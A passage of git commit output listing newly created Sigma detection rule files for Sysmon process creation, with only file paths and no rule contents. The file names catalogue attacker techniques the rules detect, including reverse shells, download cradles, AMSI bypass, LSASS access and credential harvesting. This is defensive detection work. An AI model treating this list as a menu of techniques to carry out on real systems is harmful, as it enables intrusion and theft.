tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_settingsynchost.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_sftp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_sigverif.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_ssh.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_susp_atbroker.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_susp_dxcap.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_susp_grpconv.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_tracker.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_ttdinject.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_type.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_unregmp2.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_utilityfunctions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_wfc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_wlrmdr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_workflow_compiler.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolscript_register_app.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lsass_process_clone.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_malware_conti_shadowcopy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_malware_script_dropper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mftrace_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mmc_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mofcomp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msbuild_susp_parent_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msdt_susp_cab_options.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msdt_susp_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msedge_proxy_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mshta_http.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mshta_inline_vbscript.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mshta_javascript.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mshta_lethalhta_technique.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mshta_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mshta_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mshta_susp_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msiexec_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msiexec_embedding.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msiexec_execute_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msiexec_install_quiet.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msiexec_install_remote.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msiexec_masquerading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msiexec_web_install.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msohtmed_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mspub_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msra_process_injection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mssql_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mstsc_remote_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msxsl_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msxsl_remote_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_default_accounts_manipulation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_network_connections_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_share_and_sessions_enum.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_share_unmount.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_start_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_stop_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_use_mount_admin_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_use_mount_internet_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_use_mount_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_use_password_plaintext.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_user_add.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_user_add_never_expire.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_add_rule.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_delete_rule.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_disable.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_set_rule.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_packet_capture.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_port_forwarding.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_nltest_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_nltest_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_node_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_nslookup_domain_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_nslookup_poweshell_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ntdsutil_susp_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ntdsutil_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_driver_install.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_response_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_response_file_susp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_arbitrary_cli_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_winword_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pdqdeploy_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_perl_inline_command_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_php_inline_command_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ping_hex_ip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pktmon_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_plink_port_forwarding.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_plink_susp_tunneling.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powercfg_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_add_windows_capability.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_audio_capture.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_frombase64string.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_iex.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_invoke.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_mppreference.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_cl_invocation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_cl_loadassembly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_create_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_decode_gzip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_decrypt_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_defender_disable_feature.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_defender_exclusion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_disable_firewall.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_disable_ie_features.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_downgrade_attack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_download_com_cradles.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_download_cradles.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_download_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_download_iex.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_download_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_email_exfil.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_encode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_encoded_obfusc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_encoding_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_exec_data_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_export_certificate.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_frombase64string.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_frombase64string_archive.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_get_clipboard.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_getprocess_lsass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_iex_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_invocation_specific.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_mailboxexport_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_non_interactive_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_public_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_run_script_from_ads.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_sam_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_script_engine_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_set_acl.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_set_service_disabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_snapins_hafnium.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_stop_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_susp_download_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_susp_parent_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_token_obfuscation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_webclient_casing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_x509enrollment.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_xor_commandline.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_zip_compress.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_presentationhost_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_print_remote_file_copy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_protocolhandler_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_provlaunch_potential_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_provlaunch_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_psr_capture_screenshots.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_3proxy_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_adfind_enumeration.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_adfind_susp_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_advanced_port_scanner.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_advancedrun.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_chisel.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_cleanwipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_crassus.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_csexec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_defendercheck.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_ditsnap.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_frp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_iox.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_mouselock_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_netcat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_ngrok.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_nimgrab.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_nircmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_nircmd_as_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_nmap_zenmap.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_nps.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_nsudo.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_pingcastle.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_process_hacker.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_radmin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_rcedit_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_rclone_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_runxcmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_seatbelt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_system_informer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_webbrowserpassview.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_python_adidnsdump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_python_inline_command_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_python_pty_spawn.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_query_session_exfil.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rar_compress_data.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rar_compression_with_password.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rar_susp_greedy_compression.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rasdial_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_add_run_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_add_safeboot.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_bitlocker.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml create mode 100644 